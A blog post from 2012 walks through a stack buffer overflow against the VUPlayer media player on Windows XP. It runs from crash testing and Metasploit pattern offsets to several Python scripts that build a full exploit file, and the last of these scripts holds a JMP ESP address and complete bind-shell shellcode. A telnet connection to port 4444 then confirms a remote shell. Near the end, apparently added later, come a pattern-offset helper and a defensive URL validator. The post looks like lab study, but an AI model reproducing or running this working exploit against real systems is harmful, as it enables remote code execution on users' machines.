Monday, February 13, 2012

Buffer Overflow - VUPlayer

Again, in this post I will try to exploit a piece of software using the buffer overflow technique. The software is called VUPlayer.

Let's do some testing first to make the software crash. That crash will be my attack vector.

Alhamdulillah, this morning I succeeded in crashing the software on the first try. Here's what I did.

- Of course, install VUPlayer on my Windows XP machine.

- Okay, I want to try adding a URL (of course not a valid one..  :P  )
- Make 1000 'A' characters in Notepad.


- Click the "Add URL" menu in the player, then paste the characters.

- Click OK.
- Hmm.. the player still seems to be running. Let's increase the count tenfold, to 10000 'A' characters  >:)

- Again, paste it into the 'Add URL' section of the software.

- Click OK, and then.... 
- Boom, the software crashed..  :D

- Now let's check in OllyDbg whether EIP was overwritten when the software crashed.
- Great, it looks like this bug can be our door into the system.
- Next step: find the offset in the input at which EIP gets overwritten. Let's go to the Metasploit tools directory to create a pattern.
# cd /pentest/exploits/framework/tools
- Because the software crashed with 10000 'A' characters, I'll generate a 10000-byte pattern this time.
# ./pattern_create 10000 > /var/www/files/pattern.txt

- Let's open it on the XP machine.

- Copy it, then paste it into the "Add URL" menu in the software.

- Here's what we get.

- Back to the Metasploit pattern tools. Now we use the pattern_offset script to find the exact offsets: 68423768 is the value that ended up in EIP, and 8Bh9Bi0 is the text sitting at ESP.
# ./pattern_offset 68423768
1012
# ./pattern_offset 8Bh9Bi0
1016
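How pattern_offset arrives at 1012 and 1016, as an added example (not from the original post and not Metasploit's own code): the pattern is built from unique Upper-lower-digit triplets, and a register value such as 68423768 has to be byte-reversed before searching, because x86 stores the lowest byte first.

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits, hexdigits


def pattern_create(length):
    """Return the first `length` bytes of the non-repeating pattern that
    Metasploit's pattern_create builds: "Aa0Aa1Aa2...Aa9Ab0Ab1...".
    Every 4-byte window is unique, so any register value copied from the
    crash maps to exactly one position in the input."""
    out = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]     # caller asked for more than 20280 bytes


def pattern_offset(value, length=10000):
    """Find where `value` sits in the pattern, or -1 if it is not there.

    `value` is either text seen in a memory dump (e.g. "8Bh9Bi0", the bytes
    at ESP) or a 32-bit register value printed by the debugger (e.g.
    "68423768" in EIP). A register value is decoded little-endian: 0x68423768
    was loaded from the bytes 68 37 42 68, which is the text "h7Bh"."""
    pattern = pattern_create(length)
    pos = pattern.find(value)
    if pos == -1 and len(value) == 8 and all(c in hexdigits for c in value):
        as_text = struct.pack("<I", int(value, 16)).decode("latin-1")
        pos = pattern.find(as_text)
    return pos


if __name__ == "__main__":
    # The two lookups from the walkthrough: EIP holds 0x68423768 and the
    # bytes at ESP read "8Bh9Bi0" after feeding in a 10000-byte pattern.
    print("EIP offset:", pattern_offset("68423768"))   # 1012
    print("ESP offset:", pattern_offset("8Bh9Bi0"))    # 1016
```

The 4-byte gap between the two offsets is the saved return address itself; everything from offset 1016 onward is what ESP points at after the overwritten return.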

- Next step: let's try to overwrite EIP with a word of our own, like "DEADBEEF" (again).
- To help me do this, I made a fuzzer in Python, like this.
Fuzzer:
#!/usr/bin/python
# Builds the crash input: 1012 bytes of junk up to the saved return address,
# then the 4 bytes that land in EIP (0xDEADBEEF written little-endian).
# Python 2: str literals are byte strings, so the file is opened in binary mode.
file = "agoes.txt"                   # output file name
dead = "\x41" * 1012                 # junk up to the saved return address (offset 1012)
dead += "\xEF\xBE\xAD\xDE"           # overwrites EIP with DEADBEEF
with open(file, "wb") as f:          # binary mode so the bytes are written unchanged
    f.write(dead)
- It generates a file named "agoes.txt" that contains the junk characters plus our DEADBEEF bytes.
- Let's execute it.

- Open it on the XP machine.

- Copy it, then paste it into VUPlayer.

- Here's what we got.

- Success..

- Okay, next I'll try to fill the area at ESP with NOPs.
- Edit the fuzzer script to look like this.
Fuzzer:
#!/usr/bin/python
# Same layout as before, then pad up to the ESP offset (1016) with NOPs and
# fill the rest of the 10000 bytes with INT3 (0xCC), so the debugger stops
# right there if execution ever lands at ESP.
file = "agoes.txt"                       # output file name
dead = "\x90" * 1012                     # NOP junk up to the saved return address
dead += "\xEF\xBE\xAD\xDE"               # EIP = DEADBEEF
dead += "\x90" * (1016 - len(dead))      # pad to the ESP offset (1012 + 4 = 1016, so 0 bytes here)
dead += "\xCC" * (10000 - len(dead))     # INT3 filler from ESP to the end of the 10000 bytes
with open(file, "wb") as f:              # binary mode so the bytes are written unchanged
    f.write(dead)
- Generate the file, then open it on XP.
# python ./fuzz.py

- Copy it, then paste it into VUPlayer.

- Click OK, and here's what we get.

- Looking good. Next step: search for the address of a JMP ESP instruction in the SHELL32.dll module.

- Here it is.

- Let's insert it into our fuzzer. Don't forget to convert it to little-endian byte order (lowest byte first).
7C9D30D7 = \xD7\x30\x9D\x7C
Fuzzer:
#!/usr/bin/python
# As before, but the saved return address is now replaced with the JMP ESP
# address from SHELL32.dll, so the CPU continues at ESP (the 0xCC filler).
file = "agoes.txt"                       # output file name
dead = "\x90" * 1012                     # NOP junk up to the saved return address
dead += "\xD7\x30\x9D\x7C"               # 0x7C9D30D7 = JMP ESP in SHELL32.dll, little-endian
dead += "\x90" * (1016 - len(dead))      # pad to the ESP offset (0 bytes here)
dead += "\xCC" * (10000 - len(dead))     # INT3 filler from ESP onward
with open(file, "wb") as f:              # binary mode so the bytes are written unchanged
    f.write(dead)
- Before executing the script, let's generate the payload too.
- Generate a "Windows Bind Shell" payload using msfweb.
# cd /pentest/exploits/framework2/
# ./msfweb

- Final modification to the fuzzer script.
Fuzzer:
#!/usr/bin/python
# Final layout: NOP junk, the little-endian JMP ESP address from SHELL32.dll
# in place of the saved return address, a 32-byte NOP sled at ESP, then the
# bind shell payload generated with msfweb (Python 2 byte strings).
file = "agoes.txt"                   # output file name
dead = "\x90" * 1012                 # junk up to the saved return address (offset 1012)
dead += "\xD7\x30\x9D\x7C"           # 0x7C9D30D7 = JMP ESP in SHELL32.dll, little-endian
dead += "\x90" * 32                  # NOP sled at ESP (offset 1016)
# Windows bind shell payload from msfweb, listening on port 4444
dead+="\xb8\xc0\x1b\x71\xa9\x2b\xc9\xb1\x51\xda\xd1\xd9\x74\x24\xf4\x5f"
dead+="\x31\x47\x0e\x83\xef\xfc\x03\x87\x11\x93\x5c\xfb\x4c\xb8\xd2\xeb"
dead+="\x68\xc1\x12\x14\xea\xb5\x81\xce\xcf\x42\x1c\x32\x9b\x29\x9a\x32"
dead+="\x9a\x3e\x2f\x8d\x84\x4b\x6f\x31\xb4\xa0\xd9\xba\x82\xbd\xdb\x52"
dead+="\xdb\x01\x42\x06\x98\x42\x01\x51\x60\x88\xe7\x5c\xa0\xe6\x0c\x65"
dead+="\x70\xdd\xc4\xec\x9d\x96\x4a\x2a\x5f\x42\x12\xb9\x53\xdf\x50\xe2"
dead+="\x77\xde\x8d\x1f\xa4\x6b\xd8\x73\x90\x77\xba\x48\xe9\x5c\x58\xc5"
dead+="\x49\x53\x2a\x99\x41\x18\x5c\x05\xf7\x95\xdd\x3d\x59\xc2\x53\x73"
dead+="\x6b\xfe\x3c\x74\xa5\x98\xef\xec\x22\x56\x22\x98\xc5\xeb\x70\x07"
dead+="\x7e\xf3\xa5\xdf\xb5\xe6\xba\x24\x1a\x06\x94\x05\x13\x1d\x7f\x38"
dead+="\xce\xd6\x82\x6f\x7b\xe5\x7d\x5f\x13\x30\x88\xaa\x49\x95\x74\x82"
dead+="\xc1\x49\xd8\x79\xb5\x2e\x8d\x3e\x6a\x4e\xe1\xa6\xe4\xa0\xe3\x40"
dead+="\xa6\x49\x02\x19\x20\xee\xdf\x51\x76\xb9\x20\x47\x12\x56\x8e\x32"
dead+="\x1c\x86\x58\x18\x4f\x09\x70\x37\x6f\x80\xd1\xe2\x70\xfd\xbe\xe9"
dead+="\xc6\x78\x77\xa6\x27\x52\xd8\x1c\x8c\x0e\x26\x4c\xbf\xd9\x3f\x15"
dead+="\x06\x60\x97\x1a\x50\xc6\xe8\x34\x3b\x83\x72\xd2\xac\x30\x16\x93"
dead+="\xc8\xdd\xb8\xfa\x3b\xee\xb0\x1b\x51\xaa\x4b\x01\x97\xf2\xbf\x6f"
dead+="\x26\xb0\x12\x91\x95\x19\xfe\xe0\x60\x5a\xab\x51\x3f\xf2\xd9\x5b"
dead+="\xf3\x15\xe1\xd6\xb0\xe6\xcb\x43\x6e\x4b\xa5\x22\xc1\x01\x44\x95"
dead+="\xb0\x80\x17\xea\xe3\x43\x35\xcd\x01\x5a\x16\x12\xdf\x08\x66\x13"
dead+="\xd7\x33\x48\x60\x4f\x30\xea\xb2\x14\x37\x3b\x68\x2a\x17\xac\xf2"
dead+="\x0c\x7a\x5e\x59\x52\xad\x5e\x8d"
with open(file, "wb") as f:          # binary mode so the bytes are written unchanged
    f.write(dead)
- Generate the file, then open it on XP.

- Copy all of it, then paste it into VUPlayer.

- Hmm...  still have to do some trial and error, because it doesn't work.
- But there's this error every time I open VUPlayer in OllyDbg. Maybe this is the key. Have to research it..  :)


- After doing some research, I think maybe I should try using the JMP ESP address located in the BASS module, because this module seems suspicious and vulnerable.

- Change the fuzzer script a little.
Fuzzer:
#!/usr/bin/python
# Same layout as the previous script; only the return address changes, to a
# JMP ESP inside the BASS module instead of SHELL32.dll (Python 2 byte strings).
file = "agoes.txt"                   # output file name
dead = "\x90" * 1012                 # junk up to the saved return address (offset 1012)
dead += "\xFF\xD0\x00\x10"           # 0x1000D0FF = JMP ESP in the BASS module, little-endian
dead += "\x90" * 32                  # NOP sled at ESP (offset 1016)
# Windows bind shell payload from msfweb, listening on port 4444
dead+="\xdb\xcc\xba\x37\xa5\xd6\xe2\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x51"
dead+="\x31\x50\x17\x03\x50\x17\x83\xf7\xa1\x34\x17\x0b\xc3\x53\x95\x1b"
dead+="\xed\x5b\xd9\x24\x6e\x2f\x4a\xfe\x4b\xa4\xd6\xc2\x18\xc6\xdd\x42"
dead+="\x1e\xd8\x55\xfd\x38\xad\x35\x21\x38\x5a\x80\xaa\x0e\x17\x12\x42"
dead+="\x5f\xe7\x8c\x36\x24\x27\xda\x41\xe4\x62\x2e\x4c\x24\x99\xc5\x75"
dead+="\xfc\x7a\x0e\xfc\x19\x09\x11\xda\xe0\xe5\xc8\xa9\xef\xb2\x9f\xf2"
dead+="\xf3\x45\x4b\x0f\x20\xcd\x02\x63\x1c\xcd\x75\xb8\x6d\x36\x11\xb5"
dead+="\xcd\xf8\x51\x89\xdd\x73\x15\x15\x73\x08\x96\x2d\xd5\x67\x99\x63"
dead+="\xe7\x9b\xf5\x84\x21\x05\xa5\x1c\xa6\xf9\x7b\x88\x41\x8d\x49\x17"
dead+="\xfa\x8e\x7e\xcf\xc9\x9c\x83\x34\x9e\xa1\xaa\x15\x97\xbb\x35\x28"
dead+="\x4a\x4b\xb8\x7f\xff\x4e\x43\xaf\x97\x97\xb2\xba\xc5\x7f\x3a\x92"
dead+="\x45\xd3\x97\x49\x39\x90\x44\x2e\xee\xe9\xbb\xd6\x78\x07\x60\x70"
dead+="\x2a\xae\x79\xe9\xa4\x14\x63\x61\xf2\x02\x6b\x57\x96\xbc\xc2\x02"
dead+="\x98\x6d\x8c\x08\xcb\xa0\xa4\x07\xeb\x6b\x65\xf2\xec\x44\xe2\x19"
dead+="\x5b\xe3\xba\xb6\xa3\x3d\x6c\x6c\x08\x97\x72\x5c\x23\x7f\x6a\x25"
dead+="\x82\xf9\x23\x2a\xdc\xaf\x34\x04\x87\x25\xaf\xc2\x20\xd9\x42\x83"
dead+="\x54\x77\xcd\xca\xbf\x44\x64\x0b\xd5\x10\xfe\x31\x1b\x59\xf3\x1f"
dead+="\xa2\x1b\xd9\xa1\x19\xb0\xb2\xd0\xe4\xf0\x1f\x41\xb3\x69\x12\x6b"
dead+="\x77\x7f\x2d\xe6\x3c\x7f\x07\x53\xea\x2d\xf9\x32\x45\xb8\xf8\xe5"
dead+="\x34\x69\xaa\xfa\x67\xf9\xe1\xdd\x8d\x34\xaa\x22\x5b\xa2\xb2\x23"
dead+="\x53\xcc\x9d\x50\xcb\xce\x9d\xa2\x90\xd1\x74\x78\xa6\xfe\x11\x02"
dead+="\x80\x1d\x92\xa9\xcf\x34\xaa\x9d"
with open(file, "wb") as f:          # binary mode so the bytes are written unchanged
    f.write(dead)
- Generate the new file, then open it on XP.

- Wow, the characters look very strange.  :D
- Doesn't matter; copy it, then paste it into VUPlayer.

- Connect to the bind shell payload on port 4444 using telnet.
# telnet 192.168.56.101 4444


Finally, it's working..
Exploitation successful.
(^_^)v  
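On the defensive side, the root cause of everything above is an input that is longer than the buffer it gets copied into. This added example (not from the post, and not VUPlayer's code) shows the checks an input handler like the "Add URL" dialog should apply before any copy: a length limit and a printable-URL whitelist. The 1024-byte limit and the URL syntax are assumptions for illustration, and the sample batch is constructed from the inputs used in the walkthrough.

```python
import re

# Hypothetical limits for this example; the post does not show VUPlayer's
# buffer size, only that a 10000-byte input crashes the player and that the
# saved return address sits 1012 bytes into it.
MAX_URL_LEN = 1024
URL_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*://[\x21-\x7e]+$")


def validate_url(raw):
    """Return (accepted, reason) for one "Add URL" input.

    Everything that must never reach a fixed-size buffer is refused up
    front: oversize input, bytes outside printable ASCII (NOP sleds, INT3
    padding and shellcode all contain them) and text that is not a URL.
    """
    if isinstance(raw, bytes):
        raw = raw.decode("latin-1")        # 1:1 byte-to-char, never raises
    if len(raw) > MAX_URL_LEN:
        return False, "length %d exceeds limit %d" % (len(raw), MAX_URL_LEN)
    if any(not 0x20 <= ord(c) <= 0x7e for c in raw):
        return False, "non-printable byte in input"
    if not URL_RE.match(raw):
        return False, "not a URL"
    return True, "ok"


def triage_entries(entries):
    """Check a batch of entries (e.g. a playlist the user asks the player to
    load) and return (index, reason) for each one that must be refused."""
    rejected = []
    for i, entry in enumerate(entries):
        ok, reason = validate_url(entry)
        if not ok:
            rejected.append((i, reason))
    return rejected


# Constructed sample batch: one genuine URL, then the crash inputs from the
# walkthrough (10000 x 'A', 1012 bytes of junk + DEADBEEF, a NOP sled with
# INT3 filler) and a short string that is simply not a URL.
SAMPLE_ENTRIES = [
    "http://example.com/stream/song.mp3",
    "A" * 10000,
    b"\x41" * 1012 + b"\xEF\xBE\xAD\xDE",
    b"\x90" * 32 + b"\xCC" * 16,
    "AAAA",
]

if __name__ == "__main__":
    for idx, why in triage_entries(SAMPLE_ENTRIES):
        print("entry %d rejected: %s" % (idx, why))
```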

"the quieter you become, the more you are able to hear.."

4 comments:

Rui Fujiwara said...

After I did countless trials I found a matching payload!!! And after that I looked at your blog... awesome, you found another way to exploit it!!!

Good luck!

dragon-master said...

great..
glad to hear that.. :D

anyway, thanks for coming by... :)

robzlabz said...

great :)

dragon-master said...

thanks..
still have a lot of things to study though.. :D
